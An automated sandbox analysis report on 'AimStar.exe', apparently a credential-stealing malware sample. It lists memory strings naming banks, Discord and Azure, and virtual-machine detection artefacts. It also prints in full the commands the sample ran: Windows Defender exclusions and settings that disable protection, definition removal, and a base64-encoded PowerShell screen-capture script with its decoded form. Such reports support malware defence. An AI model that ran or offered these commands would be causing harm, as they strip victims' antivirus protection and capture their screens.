Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmware
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmusrvc
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: 9K~]f8vmware
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmware)
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: rar.exe, 00000058.00000003.2314221897.00000224E3E57000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: fqEmUt
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: vmwareservice
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareuser
Source: getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: SIHClient.exe, 0000003C.00000003.2211083739.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2515221982.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2208913842.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000002.2516056869.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp, SIHClient.exe, 0000003C.00000003.2214000099.000001B10EE31000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwaretray
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: f4vmusrvc
Source: AimStar.exe, 00000002.00000002.2413694287.000002020D72C000.00000004.00000020.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2216900898.000002020D2D0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AimStar.exe, 00000002.00000003.2054517827.000002020C643000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW!
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: AimStar.exe, 00000002.00000002.2409636570.000002020C830000.00000004.00001000.00020000.00000000.sdmp, AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vboxtray
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: getmac.exe, 00000040.00000003.2187820640.0000027DE963F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000002.2189796166.0000027DE9647000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE9644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
Source: getmac.exe, 00000040.00000002.2189796166.0000027DE9624000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE95FA000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188661666.0000027DE960E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Win32_NetworkProtocolHyper-V RAWHyper-VRAWHyper-V RAW
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: getmac.exe, 00000040.00000003.2187820640.0000027DE963F000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000002.2189796166.0000027DE9647000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000040.00000003.2188342279.0000027DE9644000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd
Source: AimStar.exe, 00000002.00000003.2051229337.000002020C9D3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmwareservicerc
Source: AimStar.exe, 00000002.00000003.2403135406.000002020D78F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 0_2_00007FF710F4D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_00007FF710F4D19C

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 2_2_00007FF8A8200330 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

2_2_00007FF8A8200330

Source: C:\Users\user\Desktop\AimStar.exe

Code function: 0_2_00007FF710F634F0 GetProcessHeap,

0_2_00007FF710F634F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F4D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF710F4D19C
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F4D37C SetUnhandledExceptionFilter,	0_2_00007FF710F4D37C
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F5A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF710F5A684
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 0_2_00007FF710F4C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF710F4C910
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F4D19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF710F4D19C
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F4D37C SetUnhandledExceptionFilter,	2_2_00007FF710F4D37C
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F5A684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF710F5A684
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF710F4C910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00007FF710F4C910
Source: C:\Users\user\Desktop\AimStar.exe	Code function: 2_2_00007FF8A8153248 IsProcessorFeaturePresent,00007FF8BFAC1A90,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FF8BFAC1A90,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00007FF8A8153248
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139AB6D8 SetUnhandledExceptionFilter,	88_2_00007FF7139AB6D8
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139AA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	88_2_00007FF7139AA66C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139AB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	88_2_00007FF7139AB52C
Source: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe	Code function: 88_2_00007FF7139B4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	88_2_00007FF7139B4C10

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\AimStar.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr'

Bypasses PowerShell execution policy

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB

Encrypted powershell cmdline option found

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}

Modifies Windows Defender protection settings

Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\AimStar.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
